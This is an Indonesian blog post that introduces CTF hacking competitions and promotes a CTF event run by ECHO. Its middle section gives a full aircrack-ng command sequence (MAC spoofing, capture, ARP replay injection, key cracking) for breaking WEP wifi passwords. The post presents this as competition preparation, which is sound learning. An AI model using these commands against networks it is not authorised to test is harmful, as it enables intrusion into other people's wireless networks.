23 Jun 2010

apa itu CTF (Catch The Flag) ?

Sabtu, 5 Juni 2010 kemarin ECHO mendapat undangan buat mengisi acara Seminar & Hacking Competition dariPoliteknik Telkom Bandung. Acara Seminar & Hacking Competition ini merupakan rangkaian acara dari POLTEK TELKOM - “STUDENT CREATIVITY CONTEST 2010”. (http://e-rdc.org/v1/news.php?readmore=151)

Sebenarnya apakah arti dari CTF dalam dunia cyber / dunia maya? Kalau kita search di youtube atau di google dengan keyword catch the flag yang muncul kebanyakan adalah permainan untuk memperubutkan bendera dari lawan. Tetapi dalam hal kompetisi hacking, CTF merupakan sebuah lomba dimana para peserta di minta untuk mengambil sebuah file dari server.



CTF sendiri biasanya di bagi dalam beberapa level yang bertambah kesulitannya sesuai dengan bertambahnya level. Mungkin level pertama adalah mencari ip dari si server, karena ip merupakan hal paling penting untuk bisa mengambil file dari server.

Beberapa software yang mungkin berguna untuk lomba CTF semisal, Cain n Abel, wireshark/port scanner, zenmap, Nmap. Itu merupakan sedikit software yang bisa digunakan untuk menemukan port-port yang bisa digunakan untuk kita pakai untuk masuk ke jaringan internal. Dengan kita masuk ke jaringan maka langkah selanjutnya adalah mencari dimana file tersebut di simpan, mendecript password admin atau mendecript kode-kode tertentu untuk menemukan langkah selanjutnya sebelum kita bisa mendapatkan file yang dicari.

Cara untuk membypass password WEP wifi
untuk membypass password WEP saya  menggunakan OS backtrack 4, software / package tambahan untuk membypass password   :
-   airmon-ng
- airckrack -ng 

lanjutkan dengan beberapa command di terminal :
airmon-ng stop (interface)
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)
airodump-ng (interface)
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface) 
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
aircrack-ng -b (bssid) (file name-01.cap) 
jika berhasil maka password akan di tampilakn, seperti :
 
Kebetulan kalau ada yang pengen tahu dan pengen mencoba bagaimana rasanya menjadi hacker-hackeran, ada lomba CTF online yang diadakan oleh echo. Kalau ada yang berminat bisa mampir ke website echo (echo.or.id), untuk  lombanya sendiri http://e-rdc.org/v1/news.php?readmore=155
Diposting oleh di
Label:

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)